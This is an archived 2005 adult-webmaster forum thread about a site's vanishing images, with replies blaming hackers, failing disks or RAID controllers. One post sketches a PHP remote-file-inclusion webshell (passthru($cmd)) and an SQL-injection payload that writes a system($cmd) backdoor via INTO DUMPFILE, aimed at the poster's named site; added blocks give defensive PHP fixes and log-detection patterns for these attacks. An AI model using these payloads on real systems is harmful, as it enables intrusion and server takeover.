GoFuckYourself.com - Adult Webmaster Forum

-   -   We got hacked. (https://gfy.com/showthread.php?t=499015)

Paul Markham 08-02-2005 01:34 AM

We got hacked.
 
Well we think it's the only way the problem on the site could have happened.

A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images.

So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing.

Was in the office until 1.00 last night working at it.

Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours.

CaptainHowdy 08-02-2005 01:37 AM

Fuckersssss!! i hope things get back to normal asap !!

mrthumbs 08-02-2005 01:37 AM

yeah that's a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

mrthumbs 08-02-2005 01:38 AM

oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.

mrthumbs 08-02-2005 01:40 AM

they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.

You should write a book about the vicious attack.

mrthumbs 08-02-2005 01:42 AM

Maybe they also got access to your GFY account.

WARNING TO ALL READERS

Don't give out passwords in this thread if Charly asks for it.. it could be the hacker social engineering.

Paul Markham 08-02-2005 01:44 AM

Quote:

Originally Posted by mrthumbs
yeah that's a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.

mrthumbs 08-02-2005 01:45 AM

Quote:

Originally Posted by charly
So what do you suggest has gone wrong, we've looked at it over and over and can't find anything wrong.

But yes I do see it as strange they would take out random images.

Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php

Repetitive Monkey 08-02-2005 01:45 AM

You need to stop using you know what as the password for everything, I've told you before on two separate occasions.

Paul Markham 08-02-2005 02:06 AM

Quote:

Originally Posted by Repetitive Monkey
You need to stop using you know what as the password for everything, I've told you before on two separate occasions.

The database does not have "You know what" as a password. Would not use the one on the boards for the database.

And all the updated and changed.

Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access.

The site is updated as we add new content which is a full time operation. Well nearly.

fris 08-02-2005 02:06 AM

first mistake is not to announce that you got hacked.

:)

things you keep hush hush :)

Paul Markham 08-02-2005 02:22 AM

Quote:

Originally Posted by fris
first mistake is not to announce that you got hacked.

:)

things you keep hush hush :)

OK the sites are down for routine maintenance.

V_RocKs 08-02-2005 02:45 AM

Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,

Code:

include($p);

Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In their file they included was:

Code:

if ($cmd != '') { passthru($cmd); }

Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:

http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--

Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.
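
Added example (not part of V_RocKs's post and not the site's code): the two weaknesses described above, closed in PHP. The function names, the template map and the `girls` table are hypothetical, and SQLite through PDO stands in for the site's database so the demo runs offline.

```php
<?php
// Added example, not the site's code. resolve_template() and find_girl() are hypothetical names.

// Template selection: the request value picks a key from a fixed map and is
// never handed to include() itself.
function resolve_template(string $p, string $dir): ?string
{
    $templates = ['contact' => 'contact.php', 'home' => 'home.php']; // constructed allowlist
    if (!isset($templates[$p])) {
        return null; // unknown key: the caller answers 404 and includes nothing
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $templates[$p]);
    // Defence in depth: the resolved file must sit inside the template directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Database lookup: the value is bound as a parameter, so it is data, never SQL text.
function find_girl(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM girls WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo on constructed data: a temporary template directory and an in-memory SQLite table.
$dir = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . '/contact.php', 'contact page');
foreach (['contact', 'http://example.invalid/x.txt', '../../etc/passwd'] as $p) {
    $file = resolve_template($p, $dir);
    echo $p, ' => ', $file === null ? 'rejected' : 'include ' . basename($file), "\n";
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE girls (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO girls (name) VALUES ('sara')");
foreach (['sara', "sara' OR '1'='1"] as $name) {
    echo $name, ' => ', count(find_girl($db, $name)), " row(s)\n";
}
```

On the MySQL side, `INTO DUMPFILE` requires the `FILE` privilege, so a web application's database account that lacks it cannot write files through a query.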

darksoul 08-02-2005 02:57 AM

are you sure your hdd is fine ?
a corrupted harddisk would cause this.

Machete_ 08-02-2005 03:04 AM

look at the log files on the server, search for the filename missing, and se who last used or moved it
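
Added example (not part of the thread): the log search suggested above, extended to flag the request shapes V_RocKs describes. The log lines, addresses, paths and rule names are constructed for illustration, and the line layout assumed is the Apache common/combined format.

```php
<?php
// Added example: triage of web access-log lines. All log lines are constructed.
$log = <<<'LOG'
203.0.113.7 - - [01/Aug/2005:10:02:11 -0700] "GET /page.php?p=contact HTTP/1.1" 200 5120
198.51.100.9 - - [01/Aug/2005:10:05:40 -0700] "GET /page.php?p=http%3A%2F%2Fexample.invalid%2Fx.txt%3Fcmd=id HTTP/1.1" 200 312
203.0.113.7 - - [01/Aug/2005:10:06:02 -0700] "GET /sets/042/img_007.jpg HTTP/1.1" 404 210
192.0.2.44 - - [01/Aug/2005:10:09:30 -0700] "GET /page.php?girl=sara%27%20INTO%20DUMPFILE%20%27x HTTP/1.1" 200 98
LOG;

// Patterns for the request shapes described in the thread (hypothetical rule names).
const RULES = [
    'url-in-parameter' => '~=\s*(?:https?|ftp)://~i',       // include target supplied as a URL
    'cmd-parameter'    => '~(?:^|[?&])cmd=~i',              // command passed to an included script
    'sql-file-write'   => '~INTO\s+(?:DUMPFILE|OUTFILE)~i', // query made to write a file
];

function triage(string $log, string $missingFile): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $i => $line) {
        // Client IP, request target and status from a common/combined-format line.
        if (!preg_match('~^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})~', $line, $m)) {
            continue;
        }
        [, $ip, $target, $status] = $m;
        // Decode the query string so percent-encoded values are matched too.
        $query = rawurldecode(explode('?', $target, 2)[1] ?? '');
        foreach (RULES as $name => $re) {
            if (preg_match($re, $query)) {
                $hits[] = [$i + 1, $ip, $name];
            }
        }
        // Requests naming the file that went missing, with the status the server returned.
        if ($missingFile !== '' && strpos($target, $missingFile) !== false) {
            $hits[] = [$i + 1, $ip, "missing-file status=$status"];
        }
    }
    return $hits;
}

foreach (triage($log, 'img_007.jpg') as [$lineNo, $ip, $reason]) {
    echo "line $lineNo  $ip  $reason\n";
}
```

The web access log only shows HTTP requests; deletions made over FTP would appear in the FTP server's own transfer log instead.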

More Booze 08-02-2005 03:09 AM

Quote:

Originally Posted by mrthumbs
Just fucking with you.. probably some human error.. is it a dedicated machine?
How is it updated?

Anyway..


http://www.paulmarkham.com/all-adult-content.php

What's up with all the sarcasm? It could be some script or something the "hacker" left on the server.. :P

broke 08-02-2005 03:12 AM

Quote:

Originally Posted by ebus_dk
look at the log files on the server, search for the filename missing, and se who last used or moved it

HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

Machete_ 08-02-2005 03:15 AM

Quote:

Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

I faild to se the humor in that

More Booze 08-02-2005 03:22 AM

Quote:

Originally Posted by broke
HAHAHA.

Do you honestly think Charly's going to grep logs? Or hire someone to do it?

Ummmmm. His serveradmin might do it for him.

beemk 08-02-2005 03:24 AM

Quote:

Originally Posted by mrthumbs
yeah that's a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..

:1orglaugh :1orglaugh :1orglaugh :1orglaugh :1orglaugh :1orglaugh

broke 08-02-2005 03:26 AM

Quote:

Originally Posted by ebus_dk
I faild to se the humor in that

Is your E key stuck or just plain broken?

fris 08-02-2005 03:26 AM

insecure php code rocks.

Paul Markham 08-02-2005 03:30 AM

Quote:

Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.

I'm assuming ISPRIME checked that when we asked them about the problem, but will get onto them and make sure, thanks for the suggestion.

V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things.

Quote:

look at the log files on the server, search for the filename missing, and se who last used or moved it
We did that and it was no help.

Trafficbrokercom 08-02-2005 04:02 AM

first thing to do is to check /tmp for hidden shellkits ..

so you are uploading the content onto the compromised server again?

don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future?

make sure to set allow_url_fopen = Off in your php.ini

DutchTeenCash 08-02-2005 04:06 AM

So what's up with daily backups?

riddler 08-02-2005 04:11 AM

sounds more like a failing harddrive than a hacker, Hackers usually don't fuck with people they just go in for the kill and get it over with, Sounds like it's hitting bad clusters or the file system is corrupted..

Machete_ 08-02-2005 04:15 AM

Quote:

Originally Posted by riddler
sounds more like a failing harddrive than a hacker, Hackers usually don't fuck with people they just go in for the kill and get it over with, Sounds like it's hitting bad clusters or the file system is corrupted..

yep. or a failing raidcontroller
Try to run a RAID consistency test

Roald 08-02-2005 04:21 AM

Doesn't sound like a hacker to me but more like a failure in your system.

Btw make sure to make backups daily from now on ;)))

broke 08-02-2005 04:26 AM

Quote:

Originally Posted by ebus_dk
yep. or a failing raidcontroller
Try to run a RAID consistency test

Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

Violetta 08-02-2005 04:46 AM

Quote:

Originally Posted by darksoul
are you sure your hdd is fine ?
a corrupted harddisk would cause this.

It could. What OS do you run?

mikeyddddd 08-02-2005 04:49 AM

Have you let Lee help you with any problems recently?

Rui 08-02-2005 05:17 AM

bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)

pussyluver 08-02-2005 05:30 AM

nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more :(

Machete_ 08-02-2005 05:48 AM

Quote:

Originally Posted by broke
Don't know Paul/Charly's set up, but I doubt his webserver has an array. Those controllers can be problematic on Compaq/HP servers, though. God can they be problematic.

Who knows...

Sounds like a disk issue to me, though.

:1orglaugh
The old Compaq smartarrayII version 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month

DutchTeenCash 08-02-2005 05:52 AM

Quote:

Originally Posted by ebus_dk
:1orglaugh
The old Compaq smartarrayII version 2.. GOD dam they fucked the systems..
We had more than 30 proliant800 placed in danish banks

There were new softpaq's to them every month

we had them too in the company where I used to work BIG issues, our own are dells now fine and with daily backups you can't go wrong


All times are GMT -7. The time now is 01:36 PM.
